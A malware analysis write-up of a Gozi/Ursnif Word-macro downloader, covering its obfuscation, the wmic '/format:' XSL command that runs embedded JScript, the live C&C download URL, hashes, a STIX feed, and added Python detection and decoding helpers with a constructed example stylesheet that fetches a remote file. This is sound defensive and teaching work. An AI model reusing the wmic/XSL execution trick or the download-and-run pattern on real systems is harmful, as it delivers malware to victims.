Malware Analysis — Gozi/Ursnif Downloader
In the previous article, we looked at basic dynamic analysis of a NanoCore variant. In this article, we’ll analyze a VBA-macro malware sample that I came across on the ANY.RUN platform.
Note: Ensure you have the malware sample placed in a safe environment (preferably, a malware analysis lab setup) before starting analysis.
Credits: A big shout out to Max ‘Libra’ Kersten who helped me format this article and understand the intel behind this malware. Do check out his Twitter and binary analysis course.
Hashes for the sample (the outer ZIP as downloaded):
- MD5: ed7af781dd9f2b13c17da952da0742d3
- SHA256: ed75e995bab56b1de4e25e453de84e0726ead021426d6bcbacf8c62e7385114f
Unzip the sample using the default password, infected. The resulting ZIP file (ursnif.zip) is also password protected. To crack the password, I used John the Ripper on Kali Linux; you can use your preferred tool.
root@malnet:~# /opt/JohnTheRipper/run/zip2john /root/malware/Ursnif/ursnif.zip > /root/malware/Ursnif/hash.txt
ver 2.0 ursnif.zip/info_08.22.doc PKZIP Encr: cmplen=50689, decmplen=101376, crc=2DCC1165
root@malnet:~# /opt/JohnTheRipper/run/john --format=pkzip /root/malware/Ursnif/hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/opt/JohnTheRipper/run/password.lst, rules:Wordlist
777 (ursnif.zip/info_08.22.doc)
1g 0:00:00:00 DONE 2/3 (2019-09-08 17:56) 25.00g/s 1401Kp/s 1401Kc/s 1401KC/s 123456..Peter
Use the "--show" option to display all of the cracked passwords reliably
Session completed
The password for the sample is 777.
root@malnet:~# unzip /root/malware/Ursnif/ursnif.zip
Archive: /root/malware/Ursnif/ursnif.zip
[/root/malware/Ursnif/ursnif.zip] info_08.22.doc password:
inflating: info_08.22.doc
Hashes for info_08.22.doc:
- MD5: d4c7cadc810aeaf4397f1a1a245a35ea
- SHA256: f8c81e287393aadfc13905f46aab34edd55eed46a57ffa4dc74346e438495d4e
Dumping VBA Macros
I used OfficeMalScanner to dump the VBA macros (olevba from oletools works just as well for this). On viewing the VBA code, I could see that the strings were obfuscated.
High-Level Notes
The code contained many junk statements. Consider the following snippet from the module aYxCV (I refer to VBA modules by the name in their Attribute VB_Name line throughout):
The blocks of code enclosed in red are junk code, while the relevant code is enclosed in green. In the sample, junk code takes the following forms:
(Adding bookmarks)
With ActiveDocument.Bookmarks
.Add Range:=Selection.Range, Name:="_obfuscatedString_"
.ShowHidden = False
End With
(Deleting bookmarks)
If ActiveDocument.Bookmarks.Exists("_obfuscatedString_") = True Then
ActiveDocument.Bookmarks("_obfuscatedString_").Delete
End If
(Overwriting bookmark text)
If ActiveDocument.Bookmarks.Exists("_obfuscatedString_") = True Then
ActiveDocument.Bookmarks("_obfuscatedString_").Select
Selection.TypeText Text:="_obfuscatedString_"
End If
(Updating document)
_obfuscatedString_ = ActiveDocument.ActiveTheme
ActiveDocument.AcceptAllRevisionsShown
_obfuscatedString_ = ActiveDocument.ActiveThemeDisplayName
ActiveDocument.Activate
For readability, I’ve removed all junk code and comments from the code shown in screenshots from this point onward.
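A quick way to do that junk removal mechanically, as an added Python example rather than anything from the original post: the regexes below match the four junk shapes listed above plus comment lines and strip them from a constructed VBA fragment. SAMPLE_VBA is made up and uses placeholder names such as aYxCV_1; aFTqlABJK is the decoder name used later in the article, but nothing here is the sample's own code.

```python
import re

# Constructed VBA fragment modelled on the junk patterns listed above; it is
# not the sample's real code. aYxCV_1 ... aYxCV_6 are made-up identifiers.
SAMPLE_VBA = '''Sub main()
    With ActiveDocument.Bookmarks
        .Add Range:=Selection.Range, Name:="aYxCV_1"
        .ShowHidden = False
    End With
    Dim cmd As String
    cmd = aFTqlABJK("633a5c")
    If ActiveDocument.Bookmarks.Exists("aYxCV_2") = True Then
        ActiveDocument.Bookmarks("aYxCV_2").Delete
    End If
    If ActiveDocument.Bookmarks.Exists("aYxCV_3") = True Then
        ActiveDocument.Bookmarks("aYxCV_3").Select
        Selection.TypeText Text:="aYxCV_4"
    End If
    ' a comment that hides nothing
    aYxCV_5 = ActiveDocument.ActiveTheme
    ActiveDocument.AcceptAllRevisionsShown
    aYxCV_6 = ActiveDocument.ActiveThemeDisplayName
    ActiveDocument.Activate
    Set sh = CreateObject("WScript.Shell")
    sh.Run cmd, 0
End Sub
'''

# Each pattern matches one whole junk construct including its trailing newline.
# re.MULTILINE makes ^ anchor at line starts; leading indentation is absorbed.
JUNK_PATTERNS = [
    # (Adding bookmarks): a With ActiveDocument.Bookmarks ... End With block
    re.compile(r'^[ \t]*With ActiveDocument\.Bookmarks\s*\n'
               r'(?:[ \t]*\..*\n)*?'
               r'[ \t]*End With[ \t]*\n', re.MULTILINE),
    # (Deleting bookmarks) and (Overwriting bookmark text): an If ... Exists(...)
    # block whose body only touches Bookmarks or Selection
    re.compile(r'^[ \t]*If ActiveDocument\.Bookmarks\.Exists\(.*\) = True Then\s*\n'
               r'(?:[ \t]*(?:ActiveDocument\.Bookmarks\(.*\)\.(?:Delete|Select)'
               r'|Selection\.TypeText .*)[ \t]*\n)+'
               r'[ \t]*End If[ \t]*\n', re.MULTILINE),
    # (Updating document): the one-line ActiveTheme/Activate statements
    re.compile(r'^[ \t]*(?:\w+ = ActiveDocument\.(?:ActiveTheme|ActiveThemeDisplayName)'
               r'|ActiveDocument\.(?:AcceptAllRevisionsShown|Activate))[ \t]*\n',
               re.MULTILINE),
    # VBA comments
    re.compile(r"^[ \t]*'.*\n", re.MULTILINE),
]


def strip_junk(vba_src: str) -> str:
    """Remove the junk constructs and comments, keeping the remaining lines in order."""
    cleaned = vba_src
    for pat in JUNK_PATTERNS:
        cleaned = pat.sub('', cleaned)
    return cleaned


def junk_ratio(vba_src: str) -> float:
    """Fraction of non-blank lines removed; a cheap obfuscation signal for triage."""
    before = [l for l in vba_src.splitlines() if l.strip()]
    after = [l for l in strip_junk(vba_src).splitlines() if l.strip()]
    return 1 - len(after) / len(before) if before else 0.0


if __name__ == '__main__':
    print(strip_junk(SAMPLE_VBA))
    print(f'junk ratio: {junk_ratio(SAMPLE_VBA):.2f}')
```

On the constructed fragment only the Sub/End Sub, the Dim, the decoder call and the WScript.Shell Run survive, which is exactly the part an analyst needs to read. The patterns are deliberately narrow (they only remove Bookmark and ActiveTheme noise in the shapes shown above), so a different family's junk will need its own entries; a high junk ratio on its own is a useful reason to look harder at a document.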
Drop axJBYm.xsl
Dynamic Method
To emulate the VBA code, I used the development version of ViperMonkey. This was very helpful here because the sample drops a file named axJBYm.xsl, and the emulation recorded the drop and saved a copy of the file.
root@malnet:~/malware/Ursnif# vmonkey info_08.22.doc
...
...
vmonkey 0.08 - https://github.com/decalage2/ViperMonkey
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/ViperMonkey/issues
===============================================================================
FILE: info_08.22.doc
INFO Starting emulation...
INFO Emulating an Office (VBA) file.
...
...
INFO Saving dropped analysis artifacts in info_08.22.doc_artifacts/
INFO Parsing VB...
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: - OLE stream: u'Macros/VBA/ThisDocument'
...
...
Recorded Actions:
+-------------------+---------------------------+---------------------------+
| Action            | Parameters                | Description               |
+-------------------+---------------------------+---------------------------+
| Found Entry Point | document_open             |                           |
| OPEN              | axJBYm.xsl                | Open File                 |
| Dropped File Hash | f17da1f0dbf6f32579e75b600 | File Name: axJBYm.xsl     |
|                   | bfc6673fe04e4ccde57094feb |                           |
|                   | 1772387f153a1b            |                           |
| run               | ['c:\\Windows\\System32\\ | Interesting Function Call |
|                   | wbem\\wmic process list   |                           |
|                   | /format:"axJBYm.xsl"', 0] |                           |
| Run               | xsl"                      | Interesting Function Call |
| Found Entry Point | userform_initialize       |                           |
+-------------------+---------------------------+---------------------------+
VBA Builtins Called: ['Bookmarks', 'Chr', 'Close', 'Len', 'Mid', 'TypeText', 'Val', 'run']
Finished analyzing info_08.22.doc .
root@malnet:~/malware/Ursnif/info_08.22.doc_artifacts# ls
axJBYm.xsl
Static Method
The content of axJBYm.xsl is embedded inside info_08.22.doc as a hex string (it begins 3c3f78…, the encoding of "<?x", the start of the XML declaration).
The highlighted statement (in the screenshot below) in main() in the module afP7R reads the hex string, converts it to ASCII and writes the result to axJBYm.xsl on disk.
The function aFTqlABJK() in the module acUTw9q converts its argument from hex to ASCII. The function a8q3wRJi() in the same module writes to a file on disk.
Hashes for axJBYm.xsl:
- MD5: a8f0def13cb3fae52f6e06050513c2c8
- SHA256: f17da1f0dbf6f32579e75b600bfc6673fe04e4ccde57094feb1772387f153a1b
Execute Embedded Code in axJBYm.xsl
The sample constructs a command line (highlighted in the screenshot below) using aFTqlABJK(), which is called from main() in the module afP7R:
After converting the hex to ASCII, the command line is:
c:\Windows\System32\wbem\wmic process list /format:"axJBYm.xsl"
The command is then executed through the Run method of a WshShell (WScript.Shell) object.
In other words, the malware author uses a legitimate, signed Windows binary, wmic.exe, to execute the JavaScript (JScript) embedded in axJBYm.xsl: when wmic applies a stylesheet passed via /format:, MSXML runs any script element the stylesheet contains. This is XSL script processing (MITRE ATT&CK T1220, often called "Squiblytwo"). A practical check is to alert on wmic.exe launched with a /format: value that is not one of its built-in format names, and on wmic.exe spawning child processes.
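The /format: check described above, as an added Python example that is not from the original post or the sample: a small triage function over constructed process-creation records (image path plus command line, as Sysmon Event ID 1 or EDR telemetry would provide). The built-in format list is wmic's own; EVENTS and the example.test URL are made up.

```python
import re

# Format names that wmic resolves to its own stylesheets in %SystemRoot%\System32\wbem.
# Anything else is a caller-supplied XSL, loaded from a local path or a URL.
BUILTIN_FORMATS = {'list', 'csv', 'hform', 'htable', 'mof', 'rawxml',
                   'table', 'textvaluelist', 'value', 'xml'}

# Constructed process-creation records (image path, command line). These are
# made-up test inputs, not real telemetry; the third mirrors the command line
# reconstructed from the sample and the fourth shows a remote stylesheet.
EVENTS = [
    ('C:\\Windows\\System32\\wbem\\WMIC.exe', 'wmic process list /format:csv'),
    ('C:\\Windows\\System32\\wbem\\WMIC.exe', 'wmic os get caption /FORMAT:list'),
    ('C:\\Windows\\System32\\wbem\\WMIC.exe',
     'c:\\Windows\\System32\\wbem\\wmic process list /format:"axJBYm.xsl"'),
    ('C:\\Windows\\System32\\wbem\\WMIC.exe',
     'wmic process list /format:http://example.test/evil.xsl'),
    ('C:\\Windows\\System32\\notepad.exe', 'notepad.exe /format:whatever.xsl'),
]

# /format:value, where value is either a double-quoted string or a bare token
FORMAT_RE = re.compile(r'/format:(?:"([^"]*)"|(\S+))', re.IGNORECASE)


def format_argument(cmdline: str):
    """The /format: value with surrounding quotes removed, or None if absent."""
    m = FORMAT_RE.search(cmdline)
    if not m:
        return None
    return m.group(1) if m.group(1) is not None else m.group(2)


def is_suspicious_wmic(image: str, cmdline: str) -> bool:
    """True when wmic.exe is asked to apply a stylesheet that is not a built-in format."""
    if not image.lower().endswith('\\wmic.exe'):
        return False
    fmt = format_argument(cmdline)
    return fmt is not None and fmt.lower() not in BUILTIN_FORMATS


def triage(events):
    """(image, command line) for every record that trips the check."""
    return [(img, cmd) for img, cmd in events if is_suspicious_wmic(img, cmd)]


if __name__ == '__main__':
    for img, cmd in triage(EVENTS):
        print('suspicious wmic /format:', format_argument(cmd), '<-', cmd)
```

Only the axJBYm.xsl and the remote-URL records are flagged. A built-in format spelled as a file name (for example list.xsl) also trips this check, which is the conservative side to err on. Pair it with an alert on wmic.exe spawning child processes: in this sample the downloaded binary is launched from inside the stylesheet's script, so its parent is wmic.exe.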
Downloading Malware
axJBYm.xsl contained a lot of junk JavaScript code. Two such blocks are enclosed in red in the screenshot below:
I’ve removed the junk code from axJBYm.xsl for readability purposes.
The JavaScript code in axJBYm.xsl first calls the function a7DGra() with argument 0.
This call rebuilds the string array auC9FNxgG at runtime: its elements are modified in place before they are used. After the modifications, auC9FNxgG contained:
[
"http://wlibby71e.com/qtra/ttqr.php?l=spxo9.j12",
"wscript.shell",
"scripting.filesystemobject",
"msxml2.xmlhttp",
"savetofile",
"run",
"deletefile",
"c:\\windows\\temp\\aChDfgl4.exe"
]
(First element in the array above is the C&C URL.)
The function ay92Yiw() (in axJBYm.xsl) is called from the stylesheet's template through an xsl tag in axJBYm.xsl:
ay92Yiw() contains calls to ActiveXObject(). This is a feature of the JScript engine rather than of Internet Explorer: when wmic applies the stylesheet, MSXML runs the embedded script with the JScript engine inside the wmic.exe process, so the download happens from wmic.exe, not from IE.
The code creates an MSXML2.XMLHTTP ActiveX object, which provides HTTP client functionality. It sends a synchronous GET request to the C&C URL and waits for the response (the malware binary). If a successful response is received, the code writes the response body to c:\windows\temp\aChDfgl4.exe, executes it and deletes axJBYm.xsl.
At the time of writing this article, the C&C URL was not reachable and no longer delivering malware.
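The static method above (carving the hex-encoded stylesheet and command line out of the macro) and the stylesheet's script hook, as one added Python example that is not from the original post or the sample. SAMPLE_XSL, WMIC_CMD and SAMPLE_VBA are constructed stand-ins: the names aFTqlABJK, a8q3wRJi and ay92Yiw are reused from the article for readability, but their bodies, the example.test host and the JScript are made up, and the constructed XSL uses plain string literals where the real sample rebuilt its strings at runtime (for those, emulation or live debugging rather than string extraction is needed).

```python
import re
import xml.etree.ElementTree as ET

# --- constructed inputs (not the sample's real content) -----------------------
# A stand-in for axJBYm.xsl: a stylesheet whose embedded JScript runs when wmic
# applies it. The host example.test and the function body are made up; only the
# function name ay92Yiw and the progIDs mirror the article.
SAMPLE_XSL = '''<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder">
<xsl:output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
function ay92Yiw() {
  var http = new ActiveXObject("MSXML2.XMLHTTP");
  http.open("GET", "http://example.test/payload.bin", false);
  http.send();
  var sh = new ActiveXObject("WScript.Shell");
  // the real sample saves the body to disk, runs it and deletes the .xsl
  return "";
}
]]>
</ms:script>
<xsl:template match="/"><xsl:value-of select="user:ay92Yiw()"/></xsl:template>
</xsl:stylesheet>
'''
WMIC_CMD = 'c:\\Windows\\System32\\wbem\\wmic process list /format:"axJBYm.xsl"'


def to_vba_hex(text: str) -> str:
    return text.encode('latin-1').hex().upper()


# Macro source shaped like the sample's main(): payload and command line sit in
# the code as hex literals (the real sample splits them across many concatenated
# strings; this helper only carves single literals).
SAMPLE_VBA = (
    'Sub main()\n'
    f'    a8q3wRJi "axJBYm.xsl", aFTqlABJK("{to_vba_hex(SAMPLE_XSL)}")\n'
    f'    CreateObject("WScript.Shell").Run aFTqlABJK("{to_vba_hex(WMIC_CMD)}"), 0\n'
    'End Sub\n'
)


# --- decoding ------------------------------------------------------------------
def vba_hex_to_text(hex_str: str) -> str:
    """Emulate aFTqlABJK(): Chr(Val("&H" & Mid(s, i, 2))) for each two-character chunk."""
    if len(hex_str) % 2:
        raise ValueError('odd-length hex string')
    return ''.join(chr(int(hex_str[i:i + 2], 16)) for i in range(0, len(hex_str), 2))


HEX_LITERAL_RE = re.compile(r'"([0-9A-Fa-f]{16,})"')


def carve_hex_literals(vba_src: str) -> list:
    """Decode every quoted hex literal of at least 8 bytes, in source order."""
    return [vba_hex_to_text(m.group(1)) for m in HEX_LITERAL_RE.finditer(vba_src)]


def classify(text: str) -> str:
    """Rough label for a decoded blob so the analyst knows where to look next."""
    head = text.lstrip()[:512].lower()
    if head.startswith('<?xml') or '<xsl:stylesheet' in head:
        return 'xsl'
    if re.search(r'\b(wmic|cmd|powershell|mshta|regsvr32|rundll32)\b', head):
        return 'cmdline'
    return 'unknown'


# --- XSL triage ----------------------------------------------------------------
PROGID_RE = re.compile(r'ActiveXObject\(\s*["\']([^"\']+)["\']\s*\)', re.IGNORECASE)
URL_RE = re.compile(r'https?://[^\s"\'<>]+', re.IGNORECASE)


def extract_xsl_scripts(xsl_text: str) -> list:
    """(language, code) for every <script> element, whatever its namespace prefix."""
    root = ET.fromstring(xsl_text)
    return [(el.get('language', ''), (el.text or '').strip())
            for el in root.iter() if el.tag.rsplit('}', 1)[-1] == 'script']


def script_indicators(code: str) -> dict:
    """ProgIDs and URLs visible as plain strings (runtime-built strings need emulation)."""
    return {'progids': sorted(set(PROGID_RE.findall(code))), 'urls': URL_RE.findall(code)}


def analyze_macro(vba_src: str) -> list:
    """Carve, decode and classify each embedded blob; dig into any stylesheet found."""
    findings = []
    for blob in carve_hex_literals(vba_src):
        item = {'kind': classify(blob), 'text': blob}
        if item['kind'] == 'xsl':
            item['scripts'] = [(lang, script_indicators(code))
                               for lang, code in extract_xsl_scripts(blob)]
        findings.append(item)
    return findings


if __name__ == '__main__':
    for finding in analyze_macro(SAMPLE_VBA):
        print(finding['kind'], finding.get('scripts') or finding['text'])
```

Run against the constructed macro, the first blob decodes to the stylesheet (its first bytes are 3c3f78, "<?x", exactly as in the sample) and the second to the wmic command line; the stylesheet's single JScript block yields the MSXML2.XMLHTTP and WScript.Shell progIDs and the download URL. On the real axJBYm.xsl the URL is only present after a7DGra() has rebuilt the array, which is why the article's walk-through goes through the runtime state of auC9FNxgG rather than through static strings.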
Component of Gozi/Ursnif Campaign
Analysis from another security researcher, Jammy, also suggests that the maldoc is part of a Gozi/Ursnif campaign. Another researcher, SomeInfoSecJerk, also found a maldoc protected by the password 777 which dropped Gozi/Ursnif malware. Another similar sample that uses wmic to download a Gozi/Ursnif variant can be found here.
A Variant
Unlike the Ursnif downloader sample analyzed by Fortinet (which uses PowerShell commands), the sample I analyzed downloads the malware by executing JavaScript embedded inside an XSL file.
Domain Information
According to VirusTotal (VT), as on 3rd September 2019, wlibby71e.com was being served by 185.174.172.98 (enclosed in green below).
According to Whois records, wlibby71e.com was registered on 22nd August 2019 by registrar, ERANET INTERNATIONAL LIMITED. According to this page, the said registrar was founded in 2000 and is based in China. The registrar’s contact phone has country code, +86 which belongs to China as well. The name servers are registered on the domain, dnspod.com and DNSPod is a DNS service provider based in China.
The above information suggests that this malware campaign may be orchestrated by a Chinese actor or someone who has made it look like a Chinese actor. However, there is no evidence to prove either case.
A Google search to find presence of the string, wlibby71e.com before August 22nd 2019 did not reveal anything substantial.
IP Information
185.174.172.98 is mapped to vps29604nl.hyperhost.name according to a reverse IP lookup on this page. The domain’s registrar is Center of Ukrainian Internet Names (UKRNAMES) which is based in Ukraine. Whois information for the said domain is available here.
The above information suggests that the C&C server (with domain, wlibby71e.com) was hosted on a Virtual Private Server (VPS). So, geo-locating the IP isn’t very useful.
STIX Feed
{
  "type": "bundle",
  "id": "bundle--e8b3e0c9-e43e-4aec-a2de-7ad5337040dc",
  "spec_version": "2.0",
  "objects": [
    {
      "type": "malware",
      "id": "malware--0999ea0c-a6f2-4c46-b2ee-3ea923848753",
      "created": "2019-09-13T20:05:00.000Z",
      "modified": "2019-09-14T00:16:20.696Z",
      "name": "Gozi/Ursnif Downloader",
      "description": "Downloads a Gozi/Ursnif variant from a remote URL when opened in MS Word with macros enabled.",
      "labels": ["dropper"]
    },
    {
      "type": "relationship",
      "id": "relationship--4ad721d4-04d0-445d-a035-be35871f647d",
      "created": "2019-09-14T00:16:20.712Z",
      "modified": "2019-09-14T00:16:20.712Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--23bbd32b-c98f-4a4a-b0ab-91aeabc7a58d",
      "target_ref": "malware--0999ea0c-a6f2-4c46-b2ee-3ea923848753"
    },
    {
      "type": "indicator",
      "id": "indicator--23bbd32b-c98f-4a4a-b0ab-91aeabc7a58d",
      "created": "2019-09-13T20:05:00.000Z",
      "modified": "2019-09-14T00:16:20.697Z",
      "name": "Gozi/Ursnif Downloader",
      "description": "This file hash indicates that a sample of Gozi/Ursnif Downloader is present.",
      "pattern": "[file:hashes.'MD5' = 'd4c7cadc810aeaf4397f1a1a245a35ea'] AND [url:value = 'http://wlibby71e.com/qtra/ttqr.php?l=spxo9.j12']",
      "valid_from": "2019-09-13T20:05:00Z",
      "labels": ["malicious-activity"]
    }
  ]
}
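Consuming the feed, as an added Python example that is not part of the original post: a minimal STIX 2.0 matcher that follows the "indicates" relationship and evaluates the indicator pattern against constructed observations. It also shows a caveat worth knowing about the pattern above: the two observation expressions are joined with AND, so a sighting of the file hash alone does not match, whereas with OR it would. The matcher supports only flat patterns of string-equality comparisons (no parentheses, qualifiers or other operators); BUNDLE is the feed trimmed to the fields the matcher reads, and the observation dicts are made up.

```python
import re

# The feed above, trimmed to the fields this matcher reads. The ids, the
# relationship and the pattern are copied verbatim; other fields are dropped.
BUNDLE = {
    'type': 'bundle',
    'objects': [
        {'type': 'malware',
         'id': 'malware--0999ea0c-a6f2-4c46-b2ee-3ea923848753',
         'name': 'Gozi/Ursnif Downloader'},
        {'type': 'relationship',
         'id': 'relationship--4ad721d4-04d0-445d-a035-be35871f647d',
         'relationship_type': 'indicates',
         'source_ref': 'indicator--23bbd32b-c98f-4a4a-b0ab-91aeabc7a58d',
         'target_ref': 'malware--0999ea0c-a6f2-4c46-b2ee-3ea923848753'},
        {'type': 'indicator',
         'id': 'indicator--23bbd32b-c98f-4a4a-b0ab-91aeabc7a58d',
         'pattern': "[file:hashes.'MD5' = 'd4c7cadc810aeaf4397f1a1a245a35ea'] "
                    "AND [url:value = 'http://wlibby71e.com/qtra/ttqr.php?l=spxo9.j12']"},
    ],
}

# Constructed observations in the shape of STIX cyber-observable objects.
HASH_ONLY = [{'type': 'file', 'hashes': {'MD5': 'd4c7cadc810aeaf4397f1a1a245a35ea'}}]
HASH_AND_URL = HASH_ONLY + [{'type': 'url',
                             'value': 'http://wlibby71e.com/qtra/ttqr.php?l=spxo9.j12'}]

# one observation expression: [object_path = 'value']
COMPARISON_RE = re.compile(r"\[\s*(\S+)\s*=\s*'([^']*)'\s*\]")


def resolve(observation: dict, object_path: str):
    """Walk e.g. file:hashes.'MD5' into an observation dict; None if type or key is absent."""
    obj_type, _, rest = object_path.partition(':')
    if observation.get('type') != obj_type:
        return None
    cur = observation
    for key in (k.strip("'") for k in rest.split('.')):
        if not isinstance(cur, dict) or key not in cur:
            return None
        cur = cur[key]
    return cur


def observation_expr_matches(expr: str, observations: list) -> bool:
    """True if any observation satisfies the single equality comparison in expr."""
    m = COMPARISON_RE.fullmatch(expr.strip())
    if not m:
        raise ValueError(f'unsupported expression: {expr}')
    path, value = m.groups()
    return any(resolve(o, path) == value for o in observations)


def pattern_matches(pattern: str, observations: list) -> bool:
    """Flat patterns only (no parentheses or qualifiers); AND binds tighter than OR."""
    return any(all(observation_expr_matches(e, observations) for e in conj.split(' AND '))
               for conj in pattern.split(' OR '))


def match_bundle(bundle: dict, observations: list) -> list:
    """Names of malware objects reached via 'indicates' relationships whose pattern matches."""
    by_id = {o['id']: o for o in bundle['objects']}
    hits = []
    for rel in bundle['objects']:
        if rel['type'] != 'relationship' or rel['relationship_type'] != 'indicates':
            continue
        indicator, target = by_id[rel['source_ref']], by_id[rel['target_ref']]
        if indicator['type'] == 'indicator' and pattern_matches(indicator['pattern'], observations):
            hits.append(target['name'])
    return hits


if __name__ == '__main__':
    print('hash only    :', match_bundle(BUNDLE, HASH_ONLY))
    print('hash and url :', match_bundle(BUNDLE, HASH_AND_URL))
```

With the hash alone the bundle yields no hit; only once the URL is also observed does the relationship resolve to "Gozi/Ursnif Downloader". If the intent is that either indicator should raise the alert, as the indicator's description suggests, the two expressions should be joined with OR or published as two separate indicators.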
Hashes
ursnif.zip.zip
- MD5: ed7af781dd9f2b13c17da952da0742d3
- SHA256: ed75e995bab56b1de4e25e453de84e0726ead021426d6bcbacf8c62e7385114f
info_08.22.doc
- MD5: d4c7cadc810aeaf4397f1a1a245a35ea
- SHA256: f8c81e287393aadfc13905f46aab34edd55eed46a57ffa4dc74346e438495d4e
axJBYm.xsl
- MD5: a8f0def13cb3fae52f6e06050513c2c8
- SHA256: f17da1f0dbf6f32579e75b600bfc6673fe04e4ccde57094feb1772387f153a1b
C&C
http://wlibby71e.com/qtra/ttqr.php?l=spxo9.j12
Other URLs associated with this host are available here and in the screenshot below:
Summary
The malware sample is a .doc file with embedded VBA macros. The malicious code runs when the user enables macros after opening the document in MS Word. It drops an XSL file to disk and executes the JavaScript embedded in it through wmic. The XSL file downloads a malware binary (a Gozi/Ursnif variant) from a remote C&C server and executes it on the system.
In this article, I described my analysis of a VBA malware sample that downloads a Gozi/Ursnif variant. The VBA macros and the XSL file contained lots of junk code, which I believe helps the malware evade anti-virus software (untested hypothesis).
Thank you for reading! If you have any questions, leave them in the comments section below and I’ll get back to you as soon as I can!
Feature image credits: https://coderacademy.edu.au/blog/coding-starters/what-does-malware-analysis-involve
P.S. I also write on my blog https://0x90sploiter.wordpress.com.
Originally published at http://0x90sploiter.wordpress.com on September 10, 2019.